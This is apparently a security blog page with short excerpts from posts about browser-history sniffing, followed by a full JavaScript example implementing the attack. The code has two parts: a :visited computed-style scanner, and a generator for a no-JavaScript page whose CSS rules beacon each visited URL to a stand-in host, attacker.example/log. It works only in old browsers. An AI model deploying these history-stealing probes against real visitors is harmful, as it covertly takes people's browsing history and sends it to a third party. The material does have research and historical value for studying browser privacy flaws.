Well Websecurify Runs on The iPhone

This is not necessarily news anymore, since it was discussed on the Websecurify official blog, but we are so excited about it that we could not stop ourselves from posting it here too.

The testing engine used in this particular version of Websecurify is optimized to run with the least possible amount of memory. The results of the scanner are as good as those produced by all other Websecurify variants although in some cases it may miss some statistically unlikely types of issues. [...]


Noscript HScan

After releasing my Firefox-specific history scanner, RSnake came up with his own bleeding-edge history scanning technique, which is based on Jeremiah Grossman's implementation but does not require JavaScript. This approach has its own limitations and advantages.

On the advantages side, you don’t really need JavaScript to steal the victim’s browser history anymore. [...]


HScan Redux

Inspired by Michal Zalewski's recent Firefox bug hunt, I decided to give it a go and see what I could come up with. We all know how vulnerable Firefox and other browsers are. This is the reason why I am not particularly interested in finding specific browser bugs.

This vulnerability is not a reworked version of Jeremiah Grossman's history hack. It is completely different and should be treated as a new issue. [...]


JavaScript Visited Link Scanner

This is a technique which I learned from Jeremiah Grossman and his presentation on JavaScript malware. Please, keep all the credits for this finding to Jeremiah.

The POC presented here is my improved version of the POC presented at BlackHat. I made it work in IE6, IE7, Firefox and Opera. My main challenge was IE6. IE6 is very nasty when dealing with dynamically generated style sheets. However, this can be easily solved by reusing the current style sheet. [...]
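Added example, not code from any of the posts above, showing both forms of the :visited history probe in one JavaScript file. scanHistory implements the computed-style check this excerpt describes (inject an a:visited rule, create one link per candidate URL, read the colour the browser actually rendered), with the document and window passed in so the logic can be exercised outside a browser. cssOnlyProbeHtml generates the kind of no-JavaScript page the Noscript HScan excerpt refers to, using the widely published CSS-only approach (a per-link :visited background image that beacons to a logging URL); that mechanism is my reading of the technique, not something the excerpt spells out. The probe colour, the class name hscan, the id prefix h and the endpoint https://attacker.example/log are assumptions for the example. Browsers closed both side channels around 2010, so this only works in browsers of the era the posts discuss.

```javascript
// Added example (not from the original posts): CSS :visited history probing,
// once with JavaScript and once without. Both rely on the browser styling a
// link differently when its href is already in the history.

// Probe colour; assumed not to be used by any other rule on the page.
const PROBE_COLOR = 'rgb(255, 0, 254)';

// Minimal HTML escaping for dropping URLs into attributes and text.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// JavaScript variant: inject an a:visited rule, create an <a> per candidate
// URL, and compare the computed colour against PROBE_COLOR. `doc` and `win`
// are injectable so the logic can be driven with a stub DOM; in a real page
// call scanHistory(urls, document, window).
function scanHistory(urls, doc, win) {
  const style = doc.createElement('style');
  doc.head.appendChild(style);           // .sheet only exists once attached
  const sheet = style.sheet;
  if (sheet.insertRule) {
    sheet.insertRule(`a.hscan:visited { color: ${PROBE_COLOR}; }`, sheet.cssRules.length);
  } else {
    // IE6/IE7 have no insertRule; the post's workaround of reusing an existing
    // sheet corresponds to the addRule(selector, declarations) form.
    sheet.addRule('a.hscan:visited', `color: ${PROBE_COLOR}`);
  }

  const visited = [];
  for (const url of urls) {
    const a = doc.createElement('a');
    a.className = 'hscan';
    a.href = url;
    a.textContent = url;
    doc.body.appendChild(a);
    // Old IE exposes currentStyle instead of getComputedStyle.
    const cs = win.getComputedStyle ? win.getComputedStyle(a) : a.currentStyle;
    if (cs.color === PROBE_COLOR) visited.push(url);
    doc.body.removeChild(a);
  }
  doc.head.removeChild(style);
  return visited;
}

// No-JavaScript variant: every candidate link gets its own :visited rule whose
// background image points at a logging endpoint (assumed name). The browser
// fetches the image only for visited links, so the server log becomes the
// history report. encodeURIComponent keeps quotes, '&' and '</style>' out of
// the generated CSS, since entities are not decoded inside <style>.
function cssOnlyProbeHtml(urls, logEndpoint) {
  const rules = [];
  const links = [];
  urls.forEach((url, i) => {
    const beacon = `${logEndpoint}?visited=${encodeURIComponent(url)}`;
    rules.push(`#h${i}:visited { background: url("${beacon}"); }`);
    links.push(`<a id="h${i}" href="${escapeHtml(url)}">${escapeHtml(url)}</a>`);
  });
  return '<!DOCTYPE html><html><head><style>\n' + rules.join('\n') +
         '\n</style></head><body>\n' + links.join('\n') + '\n</body></html>';
}
```

scanHistory can be run as-is in a page of that era; cssOnlyProbeHtml is meant to be served by the logging host, which then reads the `visited` query parameter out of its access log.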
